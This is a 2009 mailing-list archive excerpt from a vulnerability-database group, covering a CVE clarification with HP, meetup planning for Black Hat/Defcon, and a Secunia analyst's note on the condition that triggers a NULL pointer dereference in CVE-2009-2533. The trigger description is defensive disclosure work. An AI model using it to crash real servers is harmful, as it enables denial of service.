Customers should monitor the Oracle site for future Critical Patch Updates. The schedule for future Oracle Critical Patch Updates is available here: http://www.oracle.com/technology/deploy/security/alerts.htm =============== HP did not request Mitre to assign a CVE. However, we did reference the CVE that Mitre assigned independently. Yours truly, John john.morris at hp.com HP Software Security Response Team (SSRT) -----Original Message----- From: security curmudgeon [mailto:jericho at attrition.org] Sent: Monday, July 27, 2009 4:33 AM To: security-alert Cc: Vulnerability Information Managers Subject: HP / OfO vulnerability question Hello HP, http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c00727143 This references CVE-2008-1666, which is not reference in the cpujul2008 Oracle update. Would you please clarify if this CVE identifier covers a vulnerability specific to OfO, or if this bulletin only covers vulnerabilities in the cpujul2008 advisory? Thank you, Brian OSVDB.org From jericho at attrition.org Tue Jul 28 04:11:26 2009 From: jericho at attrition.org (security curmudgeon) Date: Tue, 28 Jul 2009 04:11:26 +0000 (UTC) Subject: [VIM] annual VIM gathering at Black Hat / Defcon In-Reply-To: References: Message-ID: : Well? Should we have another gathering? : : Fridays seem to work well because we may have stragglers from Black Hat : and people coming in for Defcon. I assume that Quark's is gone. Last Quark's is gone, yes. : year we went to some restaurant near Quark's that provided adequate : food/drink although the layout wasn't the best. On the other hand, it : was right next to the Riviera. Anybody have other suggestions? I guess it depends on time. If we coincide with a meal, doing at a place with decent food makes sense. If off food hours, any random bar usually works. From jkouns at opensecurityfoundation.org Wed Jul 29 01:55:54 2009 From: jkouns at opensecurityfoundation.org (jkouns) Date: Tue, 28 Jul 2009 21:55:54 -0400 Subject: [VIM] annual VIM gathering at Black Hat / Defcon In-Reply-To: References: Message-ID: <4A6FAC2A.3060808@opensecurityfoundation.org> > : year we went to some restaurant near Quark's that provided adequate > : food/drink although the layout wasn't the best. On the other hand, it > : was right next to the Riviera. Anybody have other suggestions? > > I guess it depends on time. If we coincide with a meal, doing at a place > with decent food makes sense. If off food hours, any random bar usually > works. I am game for something on Friday. Guessing we will plan something a bit last minute. So if anyone is interested in attending then make sure you let one of us know! Perhaps a Peppermill lunch? =) From che at secunia.com Wed Jul 29 08:33:55 2009 From: che at secunia.com (Carsten H. Eiram) Date: Wed, 29 Jul 2009 10:33:55 +0200 Subject: [VIM] CVE-2009-2533 Message-ID: <1248856435.25272.5.camel@TS-HQ-4> When analysing this vulnerability we noticed that the NULL pointer dereference error does actually not occur because the "DataConvertBuffer" property is empty, but instead because the provided PoC includes a "DataConvertBuffer" property, but no "Content-Length" header. Any SET_PARAMETER request containing a "DataConvertBuffer" property (not necessarily empty) and either no "Content-Length" header or an invalid one triggers the NULL pointer dereference error. Our advisory, SA35815, contains a bit more information. -- Med venlig hilsen / Kind regards Carsten H. Eiram Chief Security Specialist Secunia Weidekampsgade 14 A DK-2300 Copenhagen S Denmark Phone +45 7020 5144 Fax +45 7020 5145 From coley at linus.mitre.org Fri Jul 31 18:28:52 2009 From: coley at linus.mitre.org (Steven M. Christey) Date: Fri, 31 Jul 2009 14:28:52 -0400 (EDT) Subject: [VIM] annual VIM gathering at Black Hat / Defcon In-Reply-To: <4A6FAC2A.3060808@opensecurityfoundation.org> References: <4A6FAC2A.3060808@opensecurityfoundation.org> Message-ID: Some of us talked on Thursday, and the agreement is to meet at the registration desk at the Riviera at 5 PM today, then work out some options from there. Hope to see people then! - Steve